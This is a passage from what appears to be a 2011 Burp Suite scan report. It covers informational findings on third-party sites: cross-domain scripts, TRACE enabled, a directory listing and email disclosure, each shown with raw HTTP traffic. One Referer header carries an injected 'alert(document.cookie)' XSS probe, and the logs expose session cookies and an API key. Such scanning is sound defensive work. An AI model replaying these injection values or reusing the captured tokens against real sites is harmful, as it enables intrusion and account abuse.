Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:46 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 32245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.474. http://www.veoh.com/video/share/permalinkId/v18978294NGnK88j8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /video/share/permalinkId/v18978294NGnK88j8

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/share/permalinkId/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=76
Content-Length: 31809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.475. http://www.veoh.com/xd_receiver.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /xd_receiver.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /xd_receiver.htm HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=f8c7347543a5d2e2d76864f96079fa3d&extern=0&channel=http%3A%2F%2Fwww.veoh.com%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Accept-Ranges: bytes
Date: Thu, 03 Feb 2011 20:52:29 GMT
Last-Modified: Sun, 30 Jan 2011 13:47:13 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Content-Length: 297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<body>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.js" type="text/javascript"></script>
...[SNIP]...

19.476. http://www.waspbarcode.com/scanners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.waspbarcode.com
Path:   /scanners/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /scanners/ HTTP/1.1
Host: www.waspbarcode.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 20:34:56 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Content-Length: 60930
Content-Type: text/html
Set-Cookie: Pop=Set=True; expires=Fri, 04-Feb-2011 20:34:56 GMT; path=/
Set-Cookie: WASP=firsttime=true&source=&originalid=411392716&sessionid=411392716; expires=Fri, 03-Feb-2012 20:34:56 GMT; path=/
Set-Cookie: ASPSESSIONIDCQBSCDRC=MMKFFIIBGDMFFEBNGPKMKPJL; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <title>Barcode Scanners - Laser &amp; Wireless by Wasp Barcode Technologies</
...[SNIP]...
<!-- BEGIN HumanTag Monitor. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG -->
<script type="text/javascript" language='javascript' src='http://server.iad.liveperson.net/hc/72882813/x.js?cmd=file&file=chatScript3&site=72882813&&imageUrl=http://www.waspbarcode.com/images/liveperson'> </script>
...[SNIP]...

19.477. http://www.webtoolkit.info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webtoolkit.info
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.webtoolkit.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:47:51 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.webtoolkit.info/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta
...[SNIP]...
<link rel="stylesheet" href="http://www.webtoolkit.info/wp-content/plugins/wp-syntax/wp-syntax.css" type="text/css" media="screen" />


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.478. http://www.wix.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wix.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.wix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: 1-2-HP=1172830883; Domain=wix.com; Expires=Sat, 05-Feb-2011 05:59:59 GMT; Path=/
Set-Cookie: userType=ANONYMOUS; Domain=.wix.com; Expires=Thu, 04-Feb-2016 01:34:40 GMT; Path=/
Set-Cookie: _wixRefX=null-referer; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixRefX=null-referer; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Set-Cookie: _wixCampX=null-campaign; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixCampX=null-campaign; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Set-Cookie: _wixExprX=null-expr; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixExprX=null-expr; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Set-Cookie: _wixLndX=6457463; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixLndX=6457463; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Set-Cookie: _wixTSX=1296765050363; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixTSX=1296765050363; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Set-Cookie: _wixUIDX=null-user-id; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixUIDX=null-user-id; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Set-Cookie: _wixCIDX=8e188904-2fa4-4f45-a7ad-f97f9710f96f; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixCIDX=8e188904-2fa4-4f45-a7ad-f97f9710f96f; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 26616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
</script>

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=linktree&apiKey=R_8088a4d53e1f7ce1696ebab36accd853"></script>
...[SNIP]...

19.479. http://www.youtube.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:55 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=qdTEpP4nLUU; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:30:55 GMT
Set-Cookie: GEO=d5c1c4cc7ff381ad3fe1628c5071304fcwsAAAAzVVOtwdbzTUsQfw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFZuX1FFaU5Jd1ZJS0VCX3JlSEVWM2U2UXRORTlLeWp2YTNNZ1hnbXZtbGZn -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
</script>

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflvTi9ps.js"></script>
...[SNIP]...

19.480. http://www8.tucows.com/delivery/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www8.tucows.com
Path:   /delivery/afr.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /delivery/afr.php?zoneid=187&cb=6253c4ae HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:35:17 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Fri, 03-Feb-2012 20:35:17 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 1104

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

20. File upload functionality  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:56 GMT
Expires: Thu, 03 Feb 2011 20:32:56 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=705d98a7bc0e380c:TM=1296765176:LM=1296765176:S=sHB4e3nekqE-YD1z; expires=Sat, 02-Feb-2013 20:32:56 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><input type=file name=file id=file size=40></div>
...[SNIP]...

21. TRACE method is enabled  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://superpages.122.2o7.net
Path:   /

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: superpages.122.2o7.net
Cookie: 4ba0934a98ace621

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:17:33 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: superpages.122.2o7.net
Cookie: 4ba0934a98ace621
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


22. Directory listing  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.thesfmarathon.com
Path:   /wp-content/plugins/forum-server/fs-admin/

Issue description

Directory listings do not necessarily constitute a security vulnerability. Any sensitive resources within your web root should be properly access-controlled in any case, and should not be accessible by an unauthorised party who happens to know the URL. Nevertheless, directory listings can aid an attacker by enabling them to quickly identify the resources at a given path, and proceed directly to analysing and attacking them.

Issue remediation

There is not usually any good reason to provide directory listings, and disabling them may place additional hurdles in the path of an attacker. This can normally be achieved in two ways:

Request

GET /wp-content/plugins/forum-server/fs-admin/ HTTP/1.1
Host: www.thesfmarathon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 14:17:36 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.11
Content-Length: 1875
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /wp-content/plugins/forum-server/fs-admin</title>
</head>
<body>
<h1>Index of /wp-content/plugins/forum-serve
...[SNIP]...
<img src="/icons/blank.gif" alt="Icon "> <a href="?C=N;O=D">Name</a> <a href="?C=M;O=A">Last modified</a> <a href="?C=S;O=A">Size</a> <a href="?C=D;O=A">Description</a><hr><img src="/icons/back.gif" alt="[DIR]"> <a href="/wp-content/plugins/forum-server/">Parent Directory</a>
...[SNIP]...

23. Email addresses disclosed  previous  next
There are 227 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


23.1. http://ads.gmodules.com/gadgets/makeRequest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.gmodules.com
Path:   /gadgets/makeRequest

Issue detail

The following email address was disclosed in the response:

Request

GET /gadgets/makeRequest?refresh=1800&url=http%3A%2F%2Fwww.kayak.com%2Fh%2Frss%2Fhotelads%3Fctid%3D12514%26mc%3DUSD&httpMethod=GET&headers=&postData=&authz=&st=&contentType=DOM&numEntries=3&getSummaries=false&signOwner=true&signViewer=true&gadget=http%3A%2F%2Fwww.ljmsite.com%2Fgoogle%2Fgadgetads%2Fkayakhotel%2F728x90.xml&container=ads&bypassSpecCache=&getFullHeaders=false HTTP/1.1
Host: ads.gmodules.com
Proxy-Connection: keep-alive
Referer: http://ads.gmodules.com/gadgets/ifr?synd=ads&url=http%3A%2F%2Fwww.ljmsite.com%2Fgoogle%2Fgadgetads%2Fkayakhotel%2F728x90.xml&lang=en&country=US&up_clickurl=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBuG1yFmZLTcWQPMbjlQe2s9g5trWeyQG615CeEcCNtwHQllEQARgBIMDIgxo4AFCb29C6AWDJvrKJkKTQEaABxJH67gOyAQ53d3cuYml6ZmluZC51c7oBCTcyOHg5MF9hc8gBCdoBXWh0dHA6Ly93d3cuYml6ZmluZC51cy8xNS8xODIyMjEvYWJjLWRldmVsb3BtZW50LWluYy9jaGljYWdvLmFzcHgveDIyLyUyMm5zPSUyMmFsZXJ0KDB4MDAwNkMxKeABA7gCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26num%3D1%26ggladgrp%3D9764709784055921816%26gglcreat%3D9143352621951917205%26sig%3DAGiWqtwyJ0z2eP12NfR0KoaagOUkxWNa_A%26client%3Dca-pub-3033999741136561%26adurl%3D&up_aiturl=http://googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBuG1yFmZLTcWQPMbjlQe2s9g5trWeyQG615CeEcCNtwHQllEQARgBIMDIgxo4AFCb29C6AWDJvrKJkKTQEaABxJH67gOyAQ53d3cuYml6ZmluZC51c7oBCTcyOHg5MF9hc8gBCdoBXWh0dHA6Ly93d3cuYml6ZmluZC51cy8xNS8xODIyMjEvYWJjLWRldmVsb3BtZW50LWluYy9jaGljYWdvLmFzcHgveDIyLyUyMm5zPSUyMmFsZXJ0KDB4MDAwNkMxKeABA7gCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26sigh%3DG7T3ZBT9Zc4%26label%3D_AITNAME_%26value%3D_AITVALUE_&up_ads_clicktarget_new_=0&up_rawquery=chicago%20hotels&up_city=Crystal&up_region=US-MI&up_lat=43.26&up_long=-84.91
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Fri, 04 Feb 2011 02:45:23 GMT
Content-Disposition: attachment;filename=p.txt
Content-Type: application/json; charset=UTF-8
Date: Fri, 04 Feb 2011 02:15:23 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public,max-age=1800
Age: 1246
Content-Length: 12605

throw 1; < don't be evil' >{"http://www.kayak.com/h/rss/hotelads?ctid=12514&mc=USD":{"headers":{"set-cookie":["NSC_q4-tqbslmf=ffffffff094f2a0545525d5f4f58455e445a4a422a59;expires=Fri, 04-Feb-2011 02:4
...[SNIP]...
ubDate\u003e\n \u003clastBuildDate\u003eThu, 03 Feb 2011 21:08:16 EST\u003c/lastBuildDate\u003e\n \u003cdocs\u003ehttp://www.kayak.com/h/labs/rss\u003c/docs\u003e\n \u003cmanagingEditor\u003ewebmaster@kayak.com\u003c/managingEditor\u003e\n \u003cwebMaster\u003ewebmaster@kayak.com\u003c/webMaster\u003e\n \u003citem\u003e\n \u003ctitle\u003eAllerton Hotel Chicago\u003c/title\u003e\n \u003clink\u003e\u003c/link\u003e\n \u003cdescription\u003eAllerton
...[SNIP]...

23.2. http://ads1.msads.net/ads/1/0000000001_000000000000000151527.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.msads.net
Path:   /ads/1/0000000001_000000000000000151527.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /ads/1/0000000001_000000000000000151527.gif HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ads1.msads.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 85
Content-Type: image/gif
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Age: 627356
Date: Fri, 04 Feb 2011 02:29:41 GMT
Last-Modified: Fri, 18 Feb 2005 22:41:29 GMT
Expires: Fri, 27 Jan 2012 20:13:45 GMT
Connection: keep-alive

GIF89a.......................................................!.......,........@...E.;

23.3. https://author.tucows.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://author.tucows.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: author.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:52 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Connection: close
Content-Type: text/html
Content-Length: 13446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<a href="mailto:tucowshelp@tucows.com">
...[SNIP]...
<a href="mailto:sales@butterscotch.com">sales@butterscotch.com</a>
...[SNIP]...
<a href="mailto:developer@tucows.com">developer@tucows.com</a>
...[SNIP]...

23.4. http://boardreader.com/js/dyn/afc90e59a7aa9502c583c11ef4891ce4.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boardreader.com
Path:   /js/dyn/afc90e59a7aa9502c583c11ef4891ce4.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/dyn/afc90e59a7aa9502c583c11ef4891ce4.js HTTP/1.1
Host: boardreader.com
Proxy-Connection: keep-alive
Referer: http://boardreader.com/
Accept: */*
